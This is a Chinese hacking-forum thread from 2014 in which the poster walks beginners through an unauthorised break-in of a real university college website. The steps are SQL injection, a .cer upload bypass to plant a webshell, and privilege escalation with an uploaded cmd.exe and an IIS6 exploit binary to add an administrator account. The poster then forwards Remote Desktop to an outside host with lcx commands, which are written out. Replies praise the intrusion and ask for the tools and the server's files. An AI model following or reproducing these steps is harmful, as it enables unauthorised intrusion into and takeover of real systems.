社区首页 › 技术文章 › 提权某省理工大学分站学院

蟹老板 发表于 2014-11-26 00:23:56

提权某省理工大学分站学院

本帖最后由 蟹老板 于 2014-11-26 00:23 编辑

先看看主页，恩   马赛克打得够漂亮~~

首先是注入点，这个站安全做的太差了，随便找篇新闻，就有注入点。
注入得到用户名密码 md5解密。这个就不细说了，新手也都会。今天主要说拿shell和提权。

用注入到的密码进后台，后台地址Admin_Login.asp， 很好找。。。顺便一提页面右下角就有。根本不用找。


这里验证码没显示出来，不用担心。随便输入就可以。


进入后台，先找找上传吧，这个后台看起来权限比较多，应该很容易拿shell。


添加文章那里上传图片格式有限制，那我们再找找，总有比较方面的办法。
经过一番寻找，找到了网站配置信息。这里可以添加上传格式

我添加了个asp， 去添加文章上传一下试试，还是不行。


然后我又在配置信息里添加了aaspsp，还是不行。那咱们就试试cer吧。 添加个cer格式。然后把本地的小马后缀也改成cer。再次上传。成功。

其实除了cer还有一些格式也可以试试，比如ashx这么多格式 总有一款适合你。
好了 我们用小马添加个大马。还有一句话。
然后用菜刀连接。   连接成功。


下面说提权。（其实这个站我以前来过，为了写个原创帖子，我又进去一次。）
先用菜刀查看一下权限吧。 执行whoami。

显示 拒绝访问。 不用担心，因为我用大马查看了一下， Wscript.Shell 这个组件是支持的。
可能是目录问题。那么我们就自己上传个cmd.exe，到一个可读可写的目录去。
一般情况下这个目录都是可以的 C:\RECYCLER\   好的菜刀上传一个cmd到这个目录去。

上传成功，然后我们修改一下菜刀虚拟终端的位置就可以执行cmd了。看我操作
首先输入SETP C:\RECYCLER\cmd.exe将菜刀执行的文件换成你上传的cmd路径，注意中间的空格。
然后再查看一下是否成功。输入whoami。   OK   现在已经不再拒绝访问了。


当然现在这个权限是不足以创建用户的。


这就需要我们先上传一个对应系统的iis.exe。   我之前查看了一下这个服务器的系统，是IIS6.0 那我们就传iis6用的iis.exe
因为这个系统有主动防御。 所以最好传免杀的。
传上去之后呢。我们使用一下。iis.exe的使用方法也很简单。看操作
只需在cmd下输入iis的路径和命令 格式如下
C:\RECYCLER\iis.exe “要执行的cmd命令”   注意双引号和空格。

我电脑卡了，这个部分就没办法截图了。反正就是这样执行，我就成功了。
C:\RECYCLER\iis.exe "whoami"显示的是system权限。
然后C:\RECYCLER\iis.exe "添加用户的命令"
成功添加一个用户为管理员。

好吧，接下来就是比较揪心的时候了。
有了用户，那么远程连接一下吧。
我们用大马查询一下对面注册表，看看远程端口是多少。用注册表查平时很好用。

上面显示的是3389，我去连接。 连接不上。
在这上面我花了一些时间，最后才发现，注册表显示是错误的。 实际的是3390。

我是用cmd查出3390的。
具体怎么查呢，请看下面步骤。
cmd输入 tasklist /svc   查看服务。 找到TermService 服务 记下他的PID


然后再cmd输入 netstat -ano查看所有端口。找到与刚才PID一样的端口。

3390就是他了。
然后我连接远程桌面3390端口，连接不上。 这里呢我判断他应该是内网。
那么我们用lcx转发一下试试。
上次有人说不会lcx，那么这次我就说详细一点吧。

需要 cmd和lcx 放在同一个目录下。本地一份，上传到服务器一份。
那么 仅仅几条命令就可以完成转发了。
请记清楚端口。
首先。本地监听命令
lcx -listen 2222 3333
这两个端口可以自己更改，但一定要没有被占用的。 如果这里更改端口，服务器上的命令端口也要更改，只需更改2222即可。


然后我们在服务器上运行发送命令
可以用菜刀执行。
命令如下
lcx -slave 123.123.123.123 2222 127.0.0.1 3389

图片里面的是3390，因为这个是我这台服务器的远程端口，默认的应该是3389
回车即可， 。转发期间，不能关闭cmd窗口。切记。

这样就lcx转发完成了，我们之间连接远程桌面。127.0.0.1:3333   

连接的时候，刚才打开的cmd窗口会有数据传输，这是正常现象。
然后就可以登录桌面了。

登录成功。

至此本次渗透彻底结束。      希望大学网站注意安全。

不挂黑页，不留痕迹。
轻轻地来，又轻轻地走。
我挥一挥衣袖，不带走一片云彩。


还有就是。。。。。。。   服务器里面这么多AV 、种子、游戏。
光是A片就有一百多G。。。。

你们感受一下吧。




网站管理员，服务器内存都让你吃了~~~~



最后说一句，为了让新手看得懂，这篇文我写了好久，天很冷，冻得手都麻了。版主给加点分哦。


by夜鸥

乐生乐道 发表于 2014-11-26 09:08:45

太给力啦！

qianyeyizu 发表于 2014-11-26 10:12:11

给力的楼主，给你支持一个

testKai 发表于 2014-11-26 15:40:50

LZ你好，马赛克打得不好，谷歌一下就搜索出来了

testKai 发表于 2014-11-26 15:57:58

顺便求一下那个cmd.exe iis.exe 还有lcx.exe，我找好久都木有找到

犯贱1314 发表于 2014-11-26 16:11:57

我怎么感觉后面是重点

蟹老板 发表于 2014-11-26 17:02:23

犯贱1314 发表于 2014-11-26 16:11
我怎么感觉后面是重点

那是亮点。。。   彩蛋。

蟹老板 发表于 2014-11-26 17:03:35

testKai 发表于 2014-11-26 15:57
顺便求一下那个cmd.exe iis.exe 还有lcx.exe，我找好久都木有找到

cmd每个电脑上基本上都有。   lcx百度一抓一大把呢。

蟹老板 发表于 2014-11-26 17:08:23

testKai 发表于 2014-11-26 15:40
LZ你好，马赛克打得不好，谷歌一下就搜索出来了

咳咳。。不要说出来嘛。。。{:3_62:}

super 发表于 2014-11-26 19:33:37

真的很给力啊楼主能把服务器里的xx资源网盘吗:$

查看完整版本: 提权某省理工大学分站学院